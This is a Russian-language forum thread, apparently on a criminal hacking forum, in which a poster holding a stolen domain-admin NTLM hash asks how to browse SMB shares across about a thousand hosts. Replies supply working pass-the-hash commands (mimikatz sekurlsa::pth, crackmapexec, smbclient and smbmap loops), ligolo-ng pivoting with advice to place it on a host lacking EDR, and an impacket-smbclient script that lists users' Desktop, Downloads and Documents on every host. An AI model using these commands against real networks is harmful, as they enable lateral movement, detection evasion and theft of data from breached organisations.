• [ Регистрация ]Открытая и бесплатная
  • Tg admin@ALPHV_Admin (обязательно подтверждение в ЛС форума)

Просмотр smb шар

admin

admin

#root
Администратор
Регистрация
20.01.2011
Сообщения
7,665
Розыгрыши
0
Реакции
135
Приветствую. Может кто знает решения для комфортного просмотра шар, где имеется аутентификация по хэшу? Под удобством я подразумеваю что-то наподобие того, как это в мячике устроено. Консолью двигаться по ним слишком медленно, а клир пасса для мячика нет. RDP, как один из вариантов, не подходит. Для примера, допустим, есть 1к хостов с шарами, с нелогичными именами, такие же нелогичные юзергруппы, поэтому сократить диапазон поиска не представляется возможным. Есть хэш домен админа, для доступа с хэшем по rdp нужно лезть в групполиси и отрубать рестрикшены, чего не хочется делать.
 
Чем Impacket не то ?
 
Приветствую. Воспользуйся мимикадзом:
sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's ntlm hash> /run: мячик.exe
У тебя откроется имперсанутый мячик от админа, и в мяче галку поставь, что сканишь под куррент юзером.
 
для чего? для ручного просмотра шар на 1к хостов? Нормальный вариант, просто у меня лет 70 в запасе, в лучшем случае, потом жизнь кончится
 
я же правильно понял, что я могу локально, со своей тачки, а не доменной, это делать и это сработает?
 
crackmapexec/netexec можно по хешу смотреть шары crackmapexec smb 192.168.5.3/24 -u 'Administrator' -H 'hash' --shares
 
Дружище, будь добр, перечитай мой пост. Отобразить имеющиеся шары и просматривать их - немного разные вещи
 
Можно скрипт набросать чтобы собирало список ипов и шар при нем , затем собирало содержимое в файл
 
можно, но я думаю он захлебнется, т.к. мне нужны и вложенные папки в том числе. Хочется что-то наподобие sbmclient'a только с гуишкой
 
Гляди в сторону smbclient-ng
 
Ну если их много то пиши скрипт, в цикле бегай по шарам клиентами: smbclient или smbmap, типа:

Код: Скопировать в буфер обмена
Код: 
for hash in hashes.txt; do
  echo -n $hash | smbclient //target-host/share -U username --pw-nt-hash
  # smbmap -u jsmith -p 'aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111aef4a50a94d' -H 172.16.0.20
done

ну или более продвинутое решение напиши на питоне, или тебе нужно ГУИ под винду чтоб вообще мозг выключил и тыкаешь как бот в папки мышкой?))
 
нет, зачем мне как боту мышкой тыкать, я лучше буду фантазировать, что я хакер и через cd буду шары просматривать. Успокойся и попытайся осознать, что я задал за вопрос. А что косаемо предложенного тобой решения, то все бы хорошо, но мне нужно выборочно открывать выбранные файлы. Как хакер я не хочу это делать и отгружать себе на тачку выбранный файл. Хочу как бот - мышкой тыкать и чтоб он волшебным образом открывался))
 
Подними VPN на нужном компе, подниматеся легко
Для просмотра ссылки Войди или Зарегистрируйся
github.com

Для просмотра ссылки Войди или Зарегистрируйся

An advanced, yet simple, tunneling/pivoting tool that uses a TUN interface. - nicocha30/ligolo-ng
github.com
github.com
и с своего сервака можно спокойно через VPN шариться по шарам как по своим собственным через explorer стандартный.В том числе поиск,ping и тд будет работать
 
думаю, что едр напряжет меня с лиголом
 
Если есть ДА поищи менее защищенный комп в сети, без EDR и тд.Такое бывает какой-нить полузабытый комп/сервер и там разверни.Есть конечно много ньюансов, но вариант вполне рабочий и удобный.
 
Да, ты правильно понял.
 
Что за "мячик" (мячик.ехе) такой, который вы тут упоминаете?
 

SoftPerfect Network Scanner

 
Ты, любезный топикстартер, как-то черезчур надменно себя ведёшь. Сначала просишь помощи, а потом помогающих тебе чуть ли херами не кроешь - всё они тебе, такому красивому, угодить не могут. То тебе пост не так читают, то фантазировать тебя, бедняжку, заставляют.

Поэтому следующее не для тебя, а для вменяемых членов коммюнити, для поиска и истории. Собственно, и вышел я на этот пост через поиск, когда пытался найти решение подобной задачи.

Решилась задача через опцию 'impacket-smbclient' '-inputfile'. Опция позволяет передать файл со списком команд impacket-smbclient на исполнение. Набор команд smbclient небогатый, но там есть команда 'tree', которая выдаёт дерево вложенных директорий и файлов от заданной. Далее вывод (impacket-smbclient опция '-outputfile' или stdout) или пишется в файл и далее фильтруется или сразу в pipe и на нужные фильтры. Список хостов подаётся в цикле, конкретный хост подставляется параметром в impacket-smbclient:

Bash: Скопировать в буфер обмена
Код: 
while read -u 3 -r host
    do impacket-smbclient -inputfile list_documents.cmd -dc-ip <DC IP> -hashes :'<ntlm_hash_here>' <domain_here>/Administrator@"${host}" | gzip -9c > "${host}"_documents.output.gz
done 3< hosts.list

list_documents.cmd:
Код: Скопировать в буфер обмена
Код: 
use C$
cd \Users\User
tree Desktop
tree Downloads
tree Documents
close
exit

На список от хоста из сотни тысяч файлов по соединению в несколько десятков килобайт уходит 3-4 минуты.

Было бы проще монтировать smb-шару, чтобы сразу и 'grep' тебе и 'find', но mount.cifs, к сожалению, не умеет аутентификацию через хеш. Но он умеет через kerberos ticket, но это я не исследовал. Потому оставлю как мысль для остальных. Можно было бы mount.cifs пропатчить на предмет возможности аутентификации по хешу, но такое вряд-ли в апстрим примут так как тут явно чем-то мутным попахивает. Хотя у SAMBA'вского 'smbclient' есть опция '--pw-nt-hash' - тоже как мысль.
 
Войдите или зарегистрируйтесь для ответа.
Activity
So far there's no one here
Сверху Снизу